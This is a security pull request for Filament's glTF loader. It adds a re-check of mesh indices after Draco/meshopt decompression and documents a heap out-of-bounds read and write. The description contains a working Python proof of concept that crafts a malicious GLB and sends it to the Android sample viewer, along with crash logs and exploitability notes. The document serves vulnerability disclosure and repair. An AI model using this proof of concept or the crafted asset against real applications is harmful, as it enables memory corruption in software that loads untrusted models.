### PR TITLE
[security] gltfio: validate indices after Draco/meshopt decompression

### DIFF
--- a/libs/gltfio/src/ResourceLoader.cpp
+++ b/libs/gltfio/src/ResourceLoader.cpp
@@ -782,6 +782,15 @@ bool ResourceLoader::loadResources(FFilamentAsset* asset, bool async) {
             return false;
         }
 
+        // cgltf_validate() checked the index values before the decoders ran, and it always reads
+        // the pre-decode buffer. Decompressed indices are therefore untrusted and must be checked
+        // against the vertex count before anything (e.g. tangent generation) consumes them.
+        for (auto& [prim, vertexBuffer]: primitives) {
+            if (!utility::validatePrimitiveIndices(prim)) {
+                return false;
+            }
+        }
+
         if (!uploadBuffers(asset, *pImpl->mEngine, pImpl->mUriDataCache)) {
             return false;
         }

--- a/libs/gltfio/src/Utility.cpp
+++ b/libs/gltfio/src/Utility.cpp
@@ -167,6 +167,26 @@ bool decodeMeshoptCompression(cgltf_data* data) {
     return true;
 }
 
+bool validatePrimitiveIndices(cgltf_primitive const* prim) {
+    if (!prim->indices || prim->attributes_count == 0) {
+        return true;
+    }
+
+    // cgltf_validate() guarantees that all the attributes of a primitive have the same count.
+    cgltf_accessor const* indices = prim->indices;
+    cgltf_size const vertexCount = prim->attributes[0].data->count;
+
+    for (cgltf_size i = 0; i < indices->count; ++i) {
+        cgltf_size const index = cgltf_accessor_read_index(indices, i);
+        if (UTILS_UNLIKELY(index >= vertexCount)) {
+            slog.e << "gltfio: index " << index << " at position " << i
+                   << " is out of range (vertex count is " << vertexCount << ")." << io::endl;
+            return false;
+        }
+    }
+    return true;
+}
+
 bool primitiveHasVertexColor(cgltf_primitive* inPrim) {
     for (int slot = 0; slot < inPrim->attributes_count; slot++) {
         const cgltf_attribute& inputAttribute = inPrim->attributes[slot];

--- a/libs/gltfio/src/Utility.h
+++ b/libs/gltfio/src/Utility.h
@@ -45,6 +45,7 @@ namespace filament::gltfio::utility {
 // Functions that are shared between the original implementation and the extended implementation.
 void decodeDracoMeshes(cgltf_data const* gltf, cgltf_primitive const* prim, DracoCache* dracoCache);
 bool decodeMeshoptCompression(cgltf_data* data);
+bool validatePrimitiveIndices(cgltf_primitive const* prim);
 bool primitiveHasVertexColor(cgltf_primitive* inPrim);
 uint32_t computeBindingSize(cgltf_accessor const* accessor);
 void convertBytesToShorts(uint16_t* dst, uint8_t const* src, size_t count);


### PR DESCRIPTION
## Summary

`gltfio` validates a glTF asset **before** it decodes `EXT_meshopt_compression` / Draco buffer views, and never re-checks the decoded index values. A malicious GLB can present valid fallback indices to `cgltf_validate()` and out-of-range indices to every consumer downstream, which reaches a heap out-of-bounds read **and write** in `OrientationBuilderImpl::buildWithFlatNormals()` in release builds.

This PR re-checks each primitive's indices against its vertex count immediately after decompression and fails the load if any index is out of range.

## Root cause

`utility::loadCgltfBuffers()` validates the asset:

```cpp
cgltf_result result = cgltf_load_buffers(&options, (cgltf_data*) gltf, gltfPath);
...
if (cgltf_validate((cgltf_data*) gltf) != cgltf_result_success) {
    return false;
}
```

`ResourceLoader::loadResources()` then decodes and continues straight into consumers, with no second check:

```cpp
utility::decodeDracoMeshes(gltf, prim, dracoCache);
if (!utility::decodeMeshoptCompression((cgltf_data*) gltf)) {
    return false;
}
if (!uploadBuffers(asset, *pImpl->mEngine, pImpl->mUriDataCache)) {
    return false;
}
pImpl->computeTangents(asset);
```

`decodeMeshoptCompression()` writes the decoded buffer to `buffer_view->data`, and consumers read it back through `cgltf_accessor_read_index()` → `cgltf_buffer_view_data()`, which prefers `view->data`. So after decoding, the index values a consumer sees are entirely attacker-chosen.

For a lit triangle primitive with no `NORMAL` attribute, the decoded index reaches `libs/geometry/src/SurfaceOrientation.cpp`:

```cpp
SurfaceOrientation* OrientationBuilderImpl::buildWithFlatNormals() {
    float3* normals = new float3[vertexCount];
    for (size_t a = 0; a < triangleCount; ++a) {
        const uint3 tri = triangles16 ? uint3(triangles16[a]) : triangles32[a];
        assert_invariant(tri.x < vertexCount && tri.y < vertexCount && tri.z < vertexCount);
        const float3 v1 = positions[tri.x];
        const float3 v2 = positions[tri.y];
        const float3 v3 = positions[tri.z];       // OOB read
        const float3 normal = normalize(cross(v2 - v1, v3 - v1));
        normals[tri.x] = normal;
        normals[tri.y] = normal;
        normals[tri.z] = normal;                  // OOB write
```

The only local bound check is `assert_invariant`, which is `((void)0)` under `NDEBUG`, so release builds have no check at all.

Source to sink:

```text
malicious GLB
  -> cgltf_load_buffers()
  -> cgltf_validate()                    validates the fallback indices [0, 1, 2]
  -> decodeMeshoptCompression()          replaces them with [0, 1, attacker_index]
  -> ResourceLoader::computeTangents()
  -> TangentsJob::run()
  -> SurfaceOrientation::Builder::build()
  -> buildWithFlatNormals()
       positions[attacker_index]         heap OOB read
       normals[attacker_index]           heap OOB write
```

### Why a second `cgltf_validate()` does not fix this

`cgltf_validate()` does bound-check indices, but through `cgltf_calc_index_bound()`, which reads the **buffer**, not the decoded buffer view (`third_party/cgltf/cgltf.h`):

```c
static cgltf_size cgltf_calc_index_bound(cgltf_buffer_view* buffer_view, cgltf_size offset,
        cgltf_component_type component_type, cgltf_size count)
{
    char* data = (char*)buffer_view->buffer->data + offset + buffer_view->offset;
```

`buffer_view->data` — the buffer that `decodeMeshoptCompression()` fills in and that `cgltf_buffer_view_data()` hands to consumers — is never looked at. Calling `cgltf_validate()` again after decoding would re-read the same uncompressed fallback bytes and pass again. The check has to read the decoded values, which is what this PR does.

## Fix

`utility::validatePrimitiveIndices()` in `libs/gltfio/src/Utility.cpp` reads each index through `cgltf_accessor_read_index()` — the same accessor path the consumers use, so it observes the decoded values — and compares it against `prim->attributes[0].data->count`, which is the same vertex-count definition `TangentsJob::run()` uses. `cgltf_validate()` has already guaranteed that all of a primitive's attributes share that count.

It is called in `ResourceLoader::loadResources()` after `decodeDracoMeshes()` / `decodeMeshoptCompression()`, before `uploadBuffers()` and `computeTangents()`.

This covers indices materialized by both decoders in the standard `ResourceLoader` path and turns the malformed asset into an ordinary load failure with a diagnostic instead of a memory-safety violation.

## Reproduction

```py
#!/usr/bin/env python3

import json
import os
import socket
import struct
import subprocess
import time


PACKAGE = "com.google.android.filament.gltf"
ADB = os.path.join(os.environ["LOCALAPPDATA"], "Android", "Sdk", "platform-tools", "adb.exe") \
    if os.name == "nt" else "adb"


def make_glb():
    compressed = bytes.fromhex("d100040600000000")  # [0, 1, UINT32_MAX]
    vertices = (0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0, 0.0)
    normals = (0.0, 0.0, 1.0) * 3
    texcoords = (0.0, 0.0, 1.0, 0.0, 0.0, 1.0)
    binary = struct.pack("<24f3I", *vertices, *normals, *texcoords, 0, 1, 2) + compressed
    document = {
        "asset": {
            "version": "2.0",
            "generator": "Filament meshopt flat-normal post-validation index probe",
        },
        "extensionsUsed": ["EXT_meshopt_compression"],
        "extensionsRequired": ["EXT_meshopt_compression"],
        "buffers": [{"byteLength": len(binary)}],
        "bufferViews": [
            {"buffer": 0, "byteOffset": 0, "byteLength": 36, "target": 34962},
            {"buffer": 0, "byteOffset": 36, "byteLength": 36, "target": 34962},
            {"buffer": 0, "byteOffset": 72, "byteLength": 24, "target": 34962},
            {
                "buffer": 0, "byteOffset": 96, "byteLength": 12, "target": 34963,
                "extensions": {"EXT_meshopt_compression": {
                    "buffer": 0, "byteOffset": 108, "byteLength": 8,
                    "byteStride": 4, "count": 3, "mode": "INDICES", "filter": "NONE",
                }},
            },
        ],
        "accessors": [
            {"bufferView": 0, "componentType": 5126, "count": 3, "type": "VEC3",
             "min": [0, 0, 0], "max": [1, 1, 0]},
            {"bufferView": 1, "componentType": 5126, "count": 3, "type": "VEC3"},
            {"bufferView": 2, "componentType": 5126, "count": 3, "type": "VEC2"},
            {"bufferView": 3, "componentType": 5125, "count": 3, "type": "SCALAR"},
        ],
        "meshes": [{"primitives": [{
            "attributes": {"POSITION": 0, "TEXCOORD_0": 2},
            "indices": 3, "mode": 4, "material": 0,
        }]}],
        "nodes": [{"mesh": 0}],
        "scenes": [{"nodes": [0]}],
        "scene": 0,
        "materials": [{"pbrMetallicRoughness": {"baseColorFactor": [1, 1, 1, 1]}}],
    }
    json_data = json.dumps(document, separators=(",", ":")).encode()
    json_data += b" " * (-len(json_data) % 4)
    body = struct.pack("<II", len(json_data), 0x4E4F534A) + json_data
    body += struct.pack("<II", len(binary), 0x004E4942) + binary
    return struct.pack("<III", 0x46546C67, 2, len(body) + 12) + body


def frame(opcode, data):
    mask = os.urandom(4)
    size = bytes((0x80 | len(data),)) if len(data) < 126 \
        else b"\xfe" + struct.pack("!H", len(data))
    data = bytes(value ^ mask[index % 4] for index, value in enumerate(data))
    return bytes((0x80 | opcode,)) + size + mask + data


def adb(*args):
    subprocess.run([ADB, *args], check=True, stdout=subprocess.DEVNULL)


adb("wait-for-device")
adb("forward", "tcp:8082", "tcp:8082")
adb("shell", "am", "force-stop", PACKAGE)
adb("logcat", "-c")
adb("shell", "am", "start", "-W", "-n", PACKAGE + "/.MainActivity")

time.sleep(2)
sock = socket.create_connection(("127.0.0.1", 8082))
sock.sendall(
    b"GET / HTTP/1.1\r\nHost: localhost:8082\r\nUpgrade: websocket\r\n"
    b"Connection: Upgrade\r\nSec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n"
    b"Sec-WebSocket-Version: 13\r\n\r\n"
)
sock.recv(4096)
sock.sendall(frame(1, b"poc.glb"))
sock.sendall(frame(2, make_glb()))
time.sleep(1)
sock.close()

time.sleep(3)
subprocess.run([ADB, "logcat", "-d", "-v", "brief", "libc:F", "*:S"])
```

```sh
python3 poc.py
```

Both results below were reproduced through the public `AssetLoader` / `ResourceLoader` API.

**AddressSanitizer**, at `0c40efe91c30a626ecbe86ecd5fe73fa4bab281b`, with `NDEBUG` set for `geometry` so `assert_invariant` matches release behavior:

```text
ERROR: AddressSanitizer: heap-buffer-overflow
READ of size 12
    #0 OrientationBuilderImpl::buildWithFlatNormals()
       libs/geometry/src/SurfaceOrientation.cpp:360

ERROR: AddressSanitizer: heap-buffer-overflow
WRITE of size 12
    #0 OrientationBuilderImpl::buildWithFlatNormals()
       libs/geometry/src/SurfaceOrientation.cpp:364
```

(An ASan recovery build was used only so execution could continue from the read to the write and record both reports.)

**Stock release APK**, `sample-gltf-viewer` built from `7dfaa4f09531b4d8f05e05b405e368f2a05a3e65`, Android 15 / API 35 x86_64 emulator, release and non-`DEBUGGABLE`, ADB at `uid=2000(shell)`:

```text
Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x77606dc10fc4
...
#00 pc 00000000003083a3 libfilament-jni.so
    (filament::geometry::OrientationBuilderImpl::buildWithFlatNormals()+163)
```

The malicious asset is minimal:

```text
vertex count:       3
fallback indices:   [0, 1, 2]
decoded indices:    [0, 1, 0xffffffff]
meshopt bytes:      d100040600000000
NORMAL attribute:   absent
```

## Impact

Any application that loads an untrusted glTF/GLB through Filament — downloads, content feeds, document viewers, user uploads, app-controlled network sources — can be made to read and write native heap memory at an attacker-selected relative offset.

Confirmed:

- heap out-of-bounds read;
- heap out-of-bounds write.

This is potentially exploitable native heap corruption; this PR does not claim a demonstrated RCE.

### Exploitability

This is more than an unchecked read that only crashes. `buildWithFlatNormals()` performs a direct 12-byte store at

```text
generated_normals_base + attacker_index * sizeof(float3)
```

with the index supplied by the decoded asset. The stored value is a normalized cross product of two attacker-controlled in-bounds positions and one out-of-bounds read, so it is a **constrained relative write** — not an arbitrary-address/arbitrary-value write.

During exploitability research an instrumented build with same-run heap visibility showed the relative write could be aimed at a live allocation holding a function pointer in the sample process, and redirecting a sample WebSocket callback was evaluated as a benign code-execution sink.

## Validation

- Header reorganization check: no changes required.
- `ResourceLoader.cpp` and `Utility.cpp`: Clang 16 syntax compilation passed.
- Full desktop debug build: not completed in this environment because the required libc++ development headers are not installed (`type_traits` / `condition_variable` not found).
